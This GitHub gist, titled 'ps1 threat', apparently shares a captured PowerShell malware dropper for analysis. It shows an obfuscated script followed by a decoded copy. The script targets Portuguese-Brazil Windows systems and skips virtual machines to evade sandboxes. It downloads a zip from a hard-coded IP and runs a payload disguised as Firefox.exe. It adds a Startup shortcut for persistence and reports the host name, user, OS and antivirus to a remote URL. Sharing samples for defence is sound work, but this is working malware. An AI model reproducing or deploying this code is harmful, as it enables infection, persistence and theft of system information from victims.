Last active
April 25, 2018 11:44
-
-
Save seclib/9192ff34067745e08b09a11ec6eaca72 to your computer and use it in GitHub Desktop.
ps1 threat
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function _/=\_____/==\/=\/\ | |
{ | |
try | |
{ | |
${/=======\/=\_/\/=} = Get-Random -Minimum 5 -Maximum 9 | |
${/=====\_/\/\_/\_/} = "" | |
For (${_____/=\_/==\_/\/}=0; ${_____/=\_/==\_/\/} -le ${/=======\/=\_/\/=}; ${_____/=\_/==\_/\/}++) | |
{ | |
${/=\__/==\/\/====\} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cQB3AGUAcgB0AHkAdQBpAG8AcABsAGsAagBoAGcAZgBkAHMAYQB6AHgAYwB2AGIAbgBtAFEAVwBFAFIAVABZAFUASQBPAFAAQQBTAEQARgBHAEgASgBLAEwAWgBYAEMAVgBCAE4ATQA='))) | |
${/===\/\_/====\_/=} = Get-Random -Minimum 1 -Maximum ${/=\__/==\/\/====\}.Length | |
${/=\________/=\__/} = ${/=\__/==\/\/====\}.Substring(${/===\/\_/====\_/=},1) | |
${/=====\_/\/\_/\_/} = ${/=====\_/\/\_/\_/}+${/=\________/=\__/} | |
} | |
return ${/=====\_/\/\_/\_/} | |
} | |
finally{} | |
} | |
${/===\/\_/==\/=\__} = $env:LOCALAPPDATA | |
${_____/=\/\_/==\_/} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwAxADcANAAuADEAMgA3AC4AMQAyADAALgAzAC8AMQA5AC8AaQBuAGYALgBwAGgAcAA='))) + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('PwBwAGMAPQA='))) | |
${/=\/=\_/=\__/\/\_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwAxADcANAAuADEAMgA3AC4AMQAyADAALgAzAC8AMQA5AC8AMQA5ADAANAAuAHoAaQBwAA=='))) | |
${_/===\/\/\__/===\} = ${/===\/\_/==\/=\__} + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('XABGAGkAcgBlAGYAbwB4AC4AZQB4AGUA'))) | |
function ___________/===\__ | |
{ | |
${_/\/\___/=\_/===\} = gwmi -Class Win32_ComputerSystem |select -ExpandProperty Model | |
if (${_/\/\___/=\_/===\} -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBpAHIAdAB1AGEAbABCAG8AeAA='))) -or | |
${_/\/\___/=\_/===\} -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBNAHcAYQByAGUAIABWAGkAcgB0AHUAYQBsACAAUABsAGEAdABmAG8AcgBtAA=='))) -or | |
${_/\/\___/=\_/===\} -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBpAHIAdAB1AGEAbAAgAE0AYQBjAGgAaQBuAGUA'))) -or | |
${_/\/\___/=\_/===\} -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABWAE0AIABkAG8AbQBVAA==')))) | |
{ | |
return "Y" | |
} | |
else | |
{ | |
return "N" | |
} | |
} | |
function ____________/===\_ | |
{ | |
${/\____/==\/==\/==} = gwmi -Class Win32_OperatingSystem | |
${/==\/\_/====\_/\/} = ${/\____/==\/==\/==}.MUILanguages | |
return ${/==\/\_/====\_/\/} | |
} | |
function __/\/=\/\/\_/\/\_/ | |
{ | |
Param([string]${________/\/=\/\___},[string]${_/==\___/====\___/}); | |
try | |
{ | |
${_/\_/\/\_/\/=\/==} = new-object System.Net.WebClient; | |
${_/\_/\/\_/\/=\/==}.DownloadFile(${________/\/=\/\___},${_/==\___/====\___/}); | |
return "Y" | |
}finally{} | |
} | |
function _/====\_/=\/=\/\/\ { | |
[cmdletBinding()] | |
param ( | |
[string]${___/======\__/==\/} = "${env:___/======\__/==\/}" , | |
${_/=\___/===\/\__/=} | |
) | |
BEGIN | |
{ | |
${/=\/=\/=\/\______} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBFAEwARQBDAFQAIAAqACAARgBSAE8ATQAgAEEAbgB0AGkAVgBpAHIAdQBzAFAAcgBvAGQAdQBjAHQA'))) | |
} | |
PROCESS | |
{ | |
${/=\/\/\/=====\_/\} = gwmi -Namespace $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cgBvAG8AdABcAFMAZQBjAHUAcgBpAHQAeQBDAGUAbgB0AGUAcgAyAA=='))) -Query ${/=\/=\/=\/\______} @psboundparameters | |
return ${/=\/\/\/=====\_/\}.displayName | |
} | |
END { | |
} | |
} | |
${__/=\/=\/\_/=\_/=} = "("+(gwmi -class Win32_OperatingSystem).Caption+")" | |
${/=\/\_/===\_/==\_} = "("+(gwmi -Class Win32_ComputerSystem -Property Name).Name + ")" | |
${_/\/\/=\_/=\/====} = "("+[Environment]::UserName+ ")" | |
${/===\_______/\___} = "("+(_/====\_/=\/=\/\/\)+ ")" | |
${_/=\/\/==\_/\/==\} = "("+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('NgA0ACAAQgBpAHQAcwA/ACAA'))) + [Environment]::Is64BitOperatingSystem+ ")" | |
${_/=\_/=\/\/\/\/=\} = $env:LOCALAPPDATA + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('XABDAGgAcgBvAG0AZQAuAHgAbQBsAA=='))) | |
${/====\__/=\_/==\/} = ${/===\/\_/==\/=\__} +"\"+ (_/=\_____/==\/=\/\) + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LgB6AGkAcAA='))) | |
${___/\/\_/\/==\__/} = [Environment]::GetFolderPath($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB0AGEAcgB0AHUAcAA=')))) +"\"+ (_/=\_____/==\/=\/\) + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LgBsAG4AawA='))) | |
function __/==\__/\/====\__ | |
{ | |
ni -ItemType file -Path ${_/=\_/=\/\/\/\/=\} | |
} | |
function ___/===\/\_/\__/\/ | |
{ | |
${__/====\____/\_/=} = New-Object system.Net.WebClient; | |
${__/====\____/\_/=}.downloadString($ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JAB7AF8AXwBfAF8AXwAvAD0AXAAvAFwAXwAvAD0APQBcAF8ALwB9ACQAewAvAD0AXAAvAFwAXwAvAD0APQA9AFwAXwAvAD0APQBcAF8AfQAmAG8AcwA9ACQAewBfAF8ALwA9AFwALwA9AFwALwBcAF8ALwA9AFwAXwAvAD0AfQAmAHUAcwBlAHIAPQAkAHsAXwAvAFwALwBcAC8APQBcAF8ALwA9AFwALwA9AD0APQA9AH0AJgBhAHYAPQAkAHsALwA9AD0APQBcAF8AXwBfAF8AXwBfAF8ALwBcAF8AXwBfAH0A')))) | |
} | |
function _/==\_/==\_/\/\/\_ | |
{ | |
ni -ItemType Directory -Path ${/===\/\_/==\/=\__} | |
} | |
function ___/\___/===\/\/==(${____/==\__/\/==\_/}, ${_/=\___/\/\/\_/==\}) | |
{ | |
${__/\_/\___/=\___/} = new-object -com shell.application | |
${____/==\_/===\/==} = ${__/\_/\___/=\___/}.NameSpace(${____/==\__/\/==\_/}) | |
foreach(${__/===\__/\/\_/=\} in ${____/==\_/===\/==}.items()) | |
{ | |
${__/\_/\___/=\___/}.Namespace(${_/=\___/\/\/\_/==\}).copyhere(${__/===\__/\/\_/=\}) | |
} | |
} | |
function _/==\_______/=\/== | |
{ | |
Param([string]${_/\___________/===},[string]${__/====\___/\/=\_/}); | |
try{ | |
${/=\_/\_/\_/==\__/} = New-Object -com $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAA='))) | |
${__/\_/\/=\/=\____} = ${/=\_/\_/\_/==\__/}.CreateShortcut(${_/\___________/===}) | |
${__/\_/\/=\/=\____}.TargetPath = $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JAB7AF8AXwAvAD0APQA9AD0AXABfAF8AXwAvAFwALwA9AFwAXwAvAH0A'))) | |
${__/\_/\/=\/=\____}.IconLocation = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXABzAHkAcwB0AGUAbQAzADIAXABTAEgARQBMAEwAMwAyAC4AZABsAGwALAAgADQAMQA='))) | |
${__/\_/\/=\/=\____}.Save() | |
}finally{} | |
} | |
if (([System.IO.File]::Exists(${_/=\_/=\/\/\/\/=\}))) | |
{ | |
} | |
else | |
{ | |
if ((____________/===\_) -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cAB0AC0AQgBSAA=='))) -and (___________/===\__) -eq "N") | |
{ | |
__/==\__/\/====\__ | |
_/==\_/==\_/\/\/\_ | |
__/\/=\/\/\_/\/\_/ -________/\/=\/\___ ${/=\/=\_/=\__/\/\_} -_/==\___/====\___/ ${/====\__/=\_/==\/} | |
___/\___/===\/\/== ${/====\__/=\_/==\/} ${/===\/\_/==\/=\__} | |
_/==\_______/=\/== -_/\___________/=== ${___/\/\_/\/==\__/} -__/====\___/\/=\_/ ${_/===\/\/\__/===\} | |
start-process ${_/===\/\/\__/===\} | |
___/===\/\_/\__/\/ | |
} | |
} | |
## decodes to: | |
function _/=\_____/==\/=\/\ | |
{ | |
try | |
{ | |
${/=======\/=\_/\/=} = Get-Random -Minimum 5 -Maximum 9 | |
${/=====\_/\/\_/\_/} = "" | |
For (${_____/=\_/==\_/\/}=0; ${_____/=\_/==\_/\/} -le ${/=======\/=\_/\/=}; ${_____/=\_/==\_/\/}++) | |
{ | |
${/=\__/==\/\/====\} = $('qwertyuioplkjhgfdsazxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM')) | |
${/===\/\_/====\_/=} = Get-Random -Minimum 1 -Maximum ${/=\__/==\/\/====\}.Length | |
${/=\________/=\__/} = ${/=\__/==\/\/====\}.Substring(${/===\/\_/====\_/=},1) | |
${/=====\_/\/\_/\_/} = ${/=====\_/\/\_/\_/}+${/=\________/=\__/} | |
} | |
return ${/=====\_/\/\_/\_/} | |
} | |
finally{} | |
} | |
${/===\/\_/==\/=\__} = $env:LOCALAPPDATA | |
${_____/=\/\_/==\_/} = $('http://174.127.120.3/19/inf.php')) + $('?pc=')) | |
${/=\/=\_/=\__/\/\_} = $('http://174.127.120.3/19/1904.zip')) | |
${_/===\/\/\__/===\} = ${/===\/\_/==\/=\__} + $('\Firefox.exe')) | |
function ___________/===\__ | |
{ | |
${_/\/\___/=\_/===\} = gwmi -Class Win32_ComputerSystem |select -ExpandProperty Model | |
if (${_/\/\___/=\_/===\} -eq $('VirtualBox')) -or | |
${_/\/\___/=\_/===\} -eq $('VMware Virtual Platform')) -or | |
${_/\/\___/=\_/===\} -eq $('Virtual Machine')) -or | |
${_/\/\___/=\_/===\} -eq $('HVM domU'))) | |
{ | |
return "Y" | |
} | |
else | |
{ | |
return "N" | |
} | |
} | |
function ____________/===\_ | |
{ | |
${/\____/==\/==\/==} = gwmi -Class Win32_OperatingSystem | |
${/==\/\_/====\_/\/} = ${/\____/==\/==\/==}.MUILanguages | |
return ${/==\/\_/====\_/\/} | |
} | |
function __/\/=\/\/\_/\/\_/ | |
{ | |
Param([string]${________/\/=\/\___},[string]${_/==\___/====\___/}); | |
try | |
{ | |
${_/\_/\/\_/\/=\/==} = new-object System.Net.WebClient; | |
${_/\_/\/\_/\/=\/==}.DownloadFile(${________/\/=\/\___},${_/==\___/====\___/}); | |
return "Y" | |
}finally{} | |
} | |
function _/====\_/=\/=\/\/\ { | |
[cmdletBinding()] | |
param ( | |
[string]${___/======\__/==\/} = "${env:___/======\__/==\/}" , | |
${_/=\___/===\/\__/=} | |
) | |
BEGIN | |
{ | |
${/=\/=\/=\/\______} = $('SELECT * FROM AntiVirusProduct')) | |
} | |
PROCESS | |
{ | |
${/=\/\/\/=====\_/\} = gwmi -Namespace $('root\SecurityCenter2')) -Query ${/=\/=\/=\/\______} @psboundparameters | |
return ${/=\/\/\/=====\_/\}.displayName | |
} | |
END { | |
} | |
} | |
${__/=\/=\/\_/=\_/=} = "("+(gwmi -class Win32_OperatingSystem).Caption+")" | |
${/=\/\_/===\_/==\_} = "("+(gwmi -Class Win32_ComputerSystem -Property Name).Name + ")" | |
${_/\/\/=\_/=\/====} = "("+[Environment]::UserName+ ")" | |
${/===\_______/\___} = "("+(_/====\_/=\/=\/\/\)+ ")" | |
${_/=\/\/==\_/\/==\} = "("+$('64 Bits? ')) + [Environment]::Is64BitOperatingSystem+ ")" | |
${_/=\_/=\/\/\/\/=\} = $env:LOCALAPPDATA + $('\Chrome.xml')) | |
${/====\__/=\_/==\/} = ${/===\/\_/==\/=\__} +"\"+ (_/=\_____/==\/=\/\) + $('.zip')) | |
${___/\/\_/\/==\__/} = [Environment]::GetFolderPath($('Startup'))) +"\"+ (_/=\_____/==\/=\/\) + $('.lnk')) | |
function __/==\__/\/====\__ | |
{ | |
ni -ItemType file -Path ${_/=\_/=\/\/\/\/=\} | |
} | |
function ___/===\/\_/\__/\/ | |
{ | |
${__/====\____/\_/=} = New-Object system.Net.WebClient; | |
${__/====\____/\_/=}.downloadString($ExecutionContext.InvokeCommand.ExpandString('${_____/=\/\_/==\_/}${/=\/\_/===\_/==\_}&os=${__/=\/=\/\_/=\_/=}&user=${_/\/\/=\_/=\/====}&av=${/===\_______/\___}'))) | |
} | |
function _/==\_/==\_/\/\/\_ | |
{ | |
ni -ItemType Directory -Path ${/===\/\_/==\/=\__} | |
} | |
function ___/\___/===\/\/==(${____/==\__/\/==\_/}, ${_/=\___/\/\/\_/==\}) | |
{ | |
${__/\_/\___/=\___/} = new-object -com shell.application | |
${____/==\_/===\/==} = ${__/\_/\___/=\___/}.NameSpace(${____/==\__/\/==\_/}) | |
foreach(${__/===\__/\/\_/=\} in ${____/==\_/===\/==}.items()) | |
{ | |
${__/\_/\___/=\___/}.Namespace(${_/=\___/\/\/\_/==\}).copyhere(${__/===\__/\/\_/=\}) | |
} | |
} | |
function _/==\_______/=\/== | |
{ | |
Param([string]${_/\___________/===},[string]${__/====\___/\/=\_/}); | |
try{ | |
${/=\_/\_/\_/==\__/} = New-Object -com $('WScript.Shell')) | |
${__/\_/\/=\/=\____} = ${/=\_/\_/\_/==\__/}.CreateShortcut(${_/\___________/===}) | |
${__/\_/\/=\/=\____}.TargetPath = $ExecutionContext.InvokeCommand.ExpandString('${__/====\___/\/=\_/}')) | |
${__/\_/\/=\/=\____}.IconLocation = $('%SystemRoot%\system32\SHELL32.dll, 41')) | |
${__/\_/\/=\/=\____}.Save() | |
}finally{} | |
} | |
if (([System.IO.File]::Exists(${_/=\_/=\/\/\/\/=\}))) | |
{ | |
} | |
else | |
{ | |
if ((____________/===\_) -eq $('pt-BR')) -and (___________/===\__) -eq "N") | |
{ | |
__/==\__/\/====\__ | |
_/==\_/==\_/\/\/\_ | |
__/\/=\/\/\_/\/\_/ -________/\/=\/\___ ${/=\/=\_/=\__/\/\_} -_/==\___/====\___/ ${/====\__/=\_/==\/} | |
___/\___/===\/\/== ${/====\__/=\_/==\/} ${/===\/\_/==\/=\__} | |
_/==\_______/=\/== -_/\___________/=== ${___/\/\_/\/==\__/} -__/====\___/\/=\_/ ${_/===\/\/\__/===\} | |
start-process ${_/===\/\/\__/===\} | |
___/===\/\_/\__/\/ | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment